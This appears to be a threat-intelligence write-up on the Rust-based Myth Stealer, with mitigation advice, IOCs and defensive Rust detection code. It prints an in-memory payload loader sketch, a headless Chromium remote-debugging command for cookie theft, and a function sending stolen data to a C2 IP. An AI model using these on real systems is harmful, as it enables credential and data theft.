A new and rapidly evolving malware threat, Myth Stealer, written entirely in Rust, is actively targeting users of Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, and Opera, alongside Gecko-based browsers such as Firefox.
Discovered by Trellix Advanced Research Center, this infostealer employs novel evasion techniques and highly modular code to steal sensitive user data, including passwords, cookies, credit card details, and more.
Originally distributed as a free trial on Telegram in late 2024, Myth Stealer has since transformed into a paid subscription service, facilitating cybercrime at scale.
Technical Dissection: Evasion, Extraction, and Exfiltration
Loader and Fake Window Mechanism
Upon execution, Myth Stealer displays a convincing fake window using Rust crates like native-windows-gui, egui, or native_dialog to trick users into believing a legitimate application is running.
Simultaneously, the loader decrypts the main stealer payload in memory using custom algorithms or cryptographic routines (XOR/AES, leveraging crates such as include-crypt). The decrypted payload is a 64-bit Rust DLL with key exports (DllMain and bz_internal_error). It is executed with the memexec crate, which loads a PE image from a memory buffer rather than from a file on disk, so the stealer stage never exists as a file and no file-backed module is registered in the process.
Code Excerpt: Loader Decrypting and Executing DLL (simplified illustration of the flow, not the sample's literal source)

```rust
// Simplified illustration: in the real include_crypt crate the blob is embedded with the
// include_crypt!(AES, "...") macro and decrypted with .decrypt(); decrypt_aes and exec
// below stand in for those calls so the two-stage flow is easy to follow.
use include_crypt::decrypt_aes;

let encrypted_bytes = include_bytes!("stealer_payload.aes"); // payload embedded at build time
let key = b"supersecretkey!"; // key is hardcoded or obfuscated, so it is recoverable from the binary
let decrypted_payload = decrypt_aes(encrypted_bytes, key); // plaintext DLL exists only in memory
memexec::exec(&decrypted_payload); // map the PE image and call DllMain without touching disk
```
Anti-Analysis and Obfuscation
Myth Stealer uses the obfstr crate for string obfuscation, hindering static analysis and signature-based detection: strings are stored XOR'd and resolved only at runtime by custom functions, so they never appear in the clear in the binary. Sandbox checks scan for known analyst and forensic usernames and for VM-related system files; if either is found, the malware terminates itself, thwarting sandbox analysis.
Obfstr Deobfuscation Workflow (Reverse Engineering)
- Locate calls to obfstr::xref::inner.
- Extract the operands and re-emulate the XOR/decryption logic.
- Patch the binary with the recovered strings for rapid static analysis.
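The second step of that workflow is the one analysts actually script: lift the per-string key and ciphertext from each call site and re-run the decryption. The block below is an added example written for this page, not code from Trellix or from the stealer, and it models the scheme rather than reproducing it: the xorshift64* keystream is a stand-in for obfstr's real generator, and the sandbox-check strings are constructed samples. What it shows is the shape of the recovery: because XOR is its own inverse, the same routine serves the runtime resolver and the analyst's emulation of it, and once the operands are lifted every string in the binary falls out in one pass.

```rust
// Added example: simplified model of compile-time XOR string obfuscation (as done by
// crates such as obfstr) and the analyst-side recovery. The PRNG is a stand-in.

/// One keystream byte per position from a xorshift64* state seeded with the
/// per-string key that the build embeds next to the ciphertext.
fn keystream(seed: u64, len: usize) -> Vec<u8> {
    let mut state = seed.max(1); // xorshift never leaves the all-zero state
    (0..len)
        .map(|_| {
            state ^= state >> 12;
            state ^= state << 25;
            state ^= state >> 27;
            (state.wrapping_mul(0x2545_F491_4F6C_DD1D) >> 56) as u8
        })
        .collect()
}

/// Build-time side: only ciphertext and seed land in .rdata.
fn obfuscate(plain: &str, seed: u64) -> Vec<u8> {
    plain
        .bytes()
        .zip(keystream(seed, plain.len()))
        .map(|(p, k)| p ^ k)
        .collect()
}

/// Runtime resolver, and the analyst's emulation of it: XOR is its own inverse,
/// so re-running the generator on the lifted operands yields the plaintext.
fn deobfuscate(cipher: &[u8], seed: u64) -> String {
    let plain: Vec<u8> = cipher
        .iter()
        .zip(keystream(seed, cipher.len()))
        .map(|(c, k)| c ^ k)
        .collect();
    String::from_utf8_lossy(&plain).into_owned()
}

/// Workflow step 2: each call site yields (seed immediate, ciphertext bytes);
/// recover every string at once, ready to be patched back into the binary.
fn recover_all(sites: &[(u64, Vec<u8>)]) -> Vec<String> {
    sites.iter().map(|(seed, cipher)| deobfuscate(cipher, *seed)).collect()
}

fn main() {
    // Constructed sample: strings a sandbox check might hide (not lifted from a real sample).
    let sites = vec![
        (0x5eed_0001u64, obfuscate("WDAGUtilityAccount", 0x5eed_0001)),
        (0x5eed_0002u64, obfuscate("vmmouse.sys", 0x5eed_0002)),
    ];
    for (site, plain) in sites.iter().zip(recover_all(&sites)) {
        println!("seed {:#x} {:02x?} -> {}", site.0, site.1, plain);
    }
}
```

In a real binary the operands are the seed immediate and the pointer/length passed to the resolver at each xref; the only part that changes per crate version is the generator, which is why re-emulating it from the disassembly rather than guessing is the reliable path.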
Data Harvesting: Passwords, Cookies, Clipboard
Myth Stealer targets a broad spectrum of browsers and apps:
- Chromium browsers (Chrome, Edge, Opera, Brave, Vivaldi, etc.)
- Gecko browsers (Firefox)
- Discord and its variants
For Chromium browsers, it launches the browser with remote debugging enabled and pulls cookies over the DevTools protocol, which returns cookie values in the clear without the stealer having to read the encrypted cookie database on disk:

```text
chromium.exe --remote-debugging-port=9222 --user-data-dir=<victimdir> --headless
```

If it is not already running with elevated privileges, it attempts to elevate through the Windows API ShellExecuteW with the runas verb, which surfaces a UAC prompt to the user. Clipboard hijacking is also implemented: cryptocurrency wallet addresses copied by the victim are replaced in flight with attacker-controlled ones, redirecting funds to the operators' wallets.
Data Exfiltration and Persistence
Harvested data is packed into a zip file, reversed at the byte level, and sent via HTTP POST to a C2 endpoint (example: 185[.]224[.]3[.]219:8080/api/send). Each request carries a custom header (myth-key/key) that the C2 uses to recognize its client. The byte reversal is obfuscation rather than encryption: it hides the PK signature from naive content inspection, but reversing the body again restores the archive, so a captured POST can be reconstructed and triaged.
Zip File Exfiltration Logic
```rust
use std::{error::Error, fs};

// Exfiltration as described above: read the archive, reverse it, POST it with a client token.
fn exfiltrate() -> Result<(), Box<dyn Error>> {
    let mut zip_file = fs::read("harvested_data.zip")?;
    zip_file.reverse(); // byte reversal: obfuscation only, undone by reversing again
    let client = reqwest::blocking::Client::new();
    let _res = client
        .post("http://185.224.3.219:8080/api/send")
        .header("key", "unique-myth-key") // client token the C2 expects, not encryption
        .body(zip_file)
        .send()?;
    Ok(())
}
```
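The reversal is the one part of that exfiltration a network analyst can undo from a packet capture. The following is an added example written for this page, not code from the report or from the stealer: it takes a captured POST body, checks for the reversed local-file-header signature at its tail, restores the archive and reads the entry count from the end-of-central-directory record so triage knows how many files left the host. The archive it runs on is constructed inline (one stored entry, CRC-32 left at zero); the C2 address and the key header play no part in the check.

```rust
// Added example: detect and undo Myth Stealer's byte-reversed zip framing.

const LOCAL_FILE_SIG: [u8; 4] = [0x50, 0x4b, 0x03, 0x04]; // "PK\x03\x04"
const CENTRAL_DIR_SIG: [u8; 4] = [0x50, 0x4b, 0x01, 0x02];
const EOCD_SIG: [u8; 4] = [0x50, 0x4b, 0x05, 0x06];
const EOCD_LEN: usize = 22; // fixed part of the end-of-central-directory record

/// Constructed sample: minimal stored (method 0) zip with one entry. Fields the
/// detection does not need are zero, including the CRC-32.
fn build_sample_zip(name: &str, data: &[u8]) -> Vec<u8> {
    let mut z = Vec::new();
    let put16 = |z: &mut Vec<u8>, v: u16| z.extend_from_slice(&v.to_le_bytes());
    let put32 = |z: &mut Vec<u8>, v: u32| z.extend_from_slice(&v.to_le_bytes());
    let size = data.len() as u32;

    // Local file header
    z.extend_from_slice(&LOCAL_FILE_SIG);
    put16(&mut z, 20); put16(&mut z, 0); put16(&mut z, 0); // version needed, flags, method=stored
    put16(&mut z, 0); put16(&mut z, 0);                   // mod time, mod date
    put32(&mut z, 0); put32(&mut z, size); put32(&mut z, size); // crc32, compressed, uncompressed
    put16(&mut z, name.len() as u16); put16(&mut z, 0);   // name length, extra length
    z.extend_from_slice(name.as_bytes());
    z.extend_from_slice(data);

    // Central directory header
    let cd_offset = z.len() as u32;
    z.extend_from_slice(&CENTRAL_DIR_SIG);
    put16(&mut z, 20); put16(&mut z, 20); put16(&mut z, 0); put16(&mut z, 0); // made by, needed, flags, method
    put16(&mut z, 0); put16(&mut z, 0);                   // mod time, mod date
    put32(&mut z, 0); put32(&mut z, size); put32(&mut z, size);
    put16(&mut z, name.len() as u16); put16(&mut z, 0); put16(&mut z, 0); // name, extra, comment lengths
    put16(&mut z, 0); put16(&mut z, 0); put32(&mut z, 0); // disk start, internal attrs, external attrs
    put32(&mut z, 0);                                     // offset of local header
    z.extend_from_slice(name.as_bytes());
    let cd_size = z.len() as u32 - cd_offset;

    // End of central directory
    z.extend_from_slice(&EOCD_SIG);
    put16(&mut z, 0); put16(&mut z, 0); put16(&mut z, 1); put16(&mut z, 1); // disk numbers, entry counts
    put32(&mut z, cd_size); put32(&mut z, cd_offset); put16(&mut z, 0);   // cd size, cd offset, comment len
    z
}

/// What the stealer does before POSTing: reverse the whole archive.
fn reverse_for_exfil(zip: &[u8]) -> Vec<u8> {
    let mut out = zip.to_vec();
    out.reverse();
    out
}

/// A reversed zip ends with the local file header signature read backwards (04 03 4b 50).
fn looks_like_reversed_zip(body: &[u8]) -> bool {
    let mut sig = LOCAL_FILE_SIG;
    sig.reverse();
    body.len() >= EOCD_LEN + 4 && body.ends_with(&sig)
}

/// Undo the reversal, validate the EOCD record and return the archive with its entry count.
fn recover_zip(body: &[u8]) -> Option<(Vec<u8>, u16)> {
    if !looks_like_reversed_zip(body) {
        return None;
    }
    let zip = reverse_for_exfil(body); // reversal is its own inverse
    // With no archive comment the EOCD occupies exactly the last 22 bytes.
    let eocd = &zip[zip.len() - EOCD_LEN..];
    if eocd[..4] != EOCD_SIG[..] {
        return None;
    }
    let total_entries = u16::from_le_bytes([eocd[10], eocd[11]]);
    Some((zip, total_entries))
}

fn main() {
    let zip = build_sample_zip("cookies.txt", b"session=abc123"); // constructed sample
    let body = reverse_for_exfil(&zip);
    match recover_zip(&body) {
        Some((archive, n)) => println!("recovered {}-byte zip with {} entries", archive.len(), n),
        None => println!("body is not a reversed zip"),
    }
}
```

The tail check is cheap enough to run on every POST body to an unknown host; a real archive may carry a trailing comment, in which case the EOCD has to be located by scanning backwards for its signature rather than taken as the last 22 bytes.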
Data points exfiltrated include:
- Saved passwords, cookies, autofill data, and credit card details
- Browser session tokens
- Screenshots, taken after the victim's external IP is fetched with a GET request to ipify.org
The malware maintains persistence by copying itself to AppData\Roaming\winlnk.exe and creating a .lnkk shortcut in the startup directory, registered via custom registry keys.
The Growing Threat: Rapid Adaptation and Defensive Measures
The developers behind Myth Stealer are running a well-organized operation, offering subscriptions via cryptocurrency and maintaining rapid update cycles to bypass antivirus solutions. Updates are announced via Telegram channels, while stolen credentials are traded in dark marketplaces.
Mitigation Recommendations:
- Monitor for suspicious processes utilizing browser debugging ports.
- Audit startup folders and the registry for unauthorized executables and .lnkk entries.
- Employ endpoint detection with behavioral analysis to catch in-memory and obfuscated threats.
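Two of the artifacts described above translate directly into detection logic: the cookie-theft launch from the data-harvesting section (a browser started with --remote-debugging-port, --headless and --user-data-dir by a parent that is not itself a browser) and the persistence entries (winlnk.exe under AppData\Roaming, a shortcut with the .lnkk extension in the Startup folder). The block below is an added example for this page, not tooling from Trellix or from the report; the process-event fields and the sample events are constructed, and a real deployment would feed them from the EDR or from Sysmon Event ID 1 (process creation). Developers do legitimately open the DevTools port, which is why the rule requires the full combination rather than the flag alone.

```rust
// Added example: host-side detection for the debugging-port launch and the persistence paths.

struct ProcessEvent<'a> {
    image: &'a str,        // executable name of the new process
    parent_image: &'a str, // executable name of its parent
    command_line: &'a str,
}

const BROWSERS: [&str; 6] = [
    "chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe", "firefox.exe",
];

/// Split a Windows command line on whitespace while honouring double quotes,
/// so a quoted --user-data-dir path stays a single argument.
fn split_args(cmd: &str) -> Vec<String> {
    let mut args = Vec::new();
    let mut cur = String::new();
    let mut in_quotes = false;
    for c in cmd.chars() {
        match c {
            '"' => in_quotes = !in_quotes,
            ' ' | '\t' if !in_quotes => {
                if !cur.is_empty() {
                    args.push(std::mem::take(&mut cur));
                }
            }
            _ => cur.push(c),
        }
    }
    if !cur.is_empty() {
        args.push(cur);
    }
    args
}

/// Value of a --flag=value argument, if present.
fn flag_value<'a>(args: &'a [String], flag: &str) -> Option<&'a str> {
    let prefix = format!("{}=", flag);
    args.iter().find_map(|a| a.strip_prefix(prefix.as_str()))
}

/// Returns a reason string when the event matches the stealer's cookie-theft launch.
fn detect_debug_port_abuse(ev: &ProcessEvent) -> Option<String> {
    let image = ev.image.to_ascii_lowercase();
    if !BROWSERS.contains(&image.as_str()) {
        return None;
    }
    let args = split_args(ev.command_line);
    let port = flag_value(&args, "--remote-debugging-port")?;
    let profile = flag_value(&args, "--user-data-dir")?;
    let headless = args
        .iter()
        .any(|a| a.as_str() == "--headless" || a.starts_with("--headless="));
    let parent = ev.parent_image.to_ascii_lowercase();
    let parent_is_browser = BROWSERS.contains(&parent.as_str());
    // A headless instance pointed at a profile and spawned by a non-browser parent
    // is the pattern; a developer's non-headless debug session does not match.
    if headless && !parent_is_browser {
        return Some(format!(
            "{} opened DevTools port {} headless against profile {} from parent {}",
            ev.image, port, profile, ev.parent_image
        ));
    }
    None
}

/// Flags Startup-folder and AppData entries matching the persistence described above.
fn audit_startup_entries(paths: &[&str]) -> Vec<String> {
    paths
        .iter()
        .filter_map(|p| {
            let lower = p.to_ascii_lowercase();
            if lower.ends_with(".lnkk") {
                Some(format!("shortcut with non-standard .lnkk extension: {}", p))
            } else if lower.ends_with("\\appdata\\roaming\\winlnk.exe") {
                Some(format!("executable at the reported persistence path: {}", p))
            } else {
                None
            }
        })
        .collect()
}

fn main() {
    // Constructed sample event, not a real telemetry record.
    let ev = ProcessEvent {
        image: "chrome.exe",
        parent_image: "Myth-Voice-Changer.exe",
        command_line: r#""C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\victim\AppData\Local\Google\Chrome\User Data" --headless"#,
    };
    if let Some(reason) = detect_debug_port_abuse(&ev) {
        println!("ALERT: {}", reason);
    }
    for hit in audit_startup_entries(&[r"C:\Users\victim\AppData\Roaming\winlnk.exe"]) {
        println!("ALERT: {}", hit);
    }
}
```

Firefox is in the browser list only so that a Gecko launch is classified correctly; the --remote-debugging-port pattern is Chromium's, and a Firefox event will simply not carry the flag.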
Myth Stealer exemplifies a new wave of Rust-based malware: robust, evasive, and modular—posing a formidable challenge for defenders across the globe. As browser threats escalate, proactive threat hunting and consistent user awareness remain essential.
Indicators of compromise
| SHA256 | Name |
| --- | --- |
| 1847288195fcfc03fc186bf4eead4268048ef5e082dedb963b3450ee07c23883 | loader.exe |
| 65a84024daf30c12fd2e76db661bf6e85f3da30bb3aaa7e774152855d718b0c4 | myth.exe |
| e5d09da6648add4776de8091b0182b935405791bf41476465b0e7dcb066fc0dc | myth.exe |
| f7cb6626e311181d9ded9536b1fbdf709b8254abd8d0810e04cebefea2fed131 | Mythic Guardian.exe |
| acd66cb5f1447b803245c495400ad0886352920e35defcca6c45519fb7d33693 | myth.exe |
| c7ae9d808e97fe6d6bf97aaf0775b9b6e68449f10bcc933bf07ba9d34d75a379 | Pckr.exe |
| 6c54e6648a6a33583d7707a9f7c5e83dd08ed481df6354c52e8f81e729d74a82 | Myth-Voice-Changer.exe |
| 7e2bed39eea850960a0d043e6e671154f413f5fe2cc7cafe6d92c903b3a2e8d1 | build-213.exe (free trial version) |
| b180f6f9f7eb0bb1a12a7e7c8216499366419b1083c84c4af5b0ee69b3016186 | krx ultimate crack 1.31.rar |
| 0631a62a173833c7c821989e63f77632ecce30ca5a7049db4898ff0505abf32e | Krx Clinet.exe |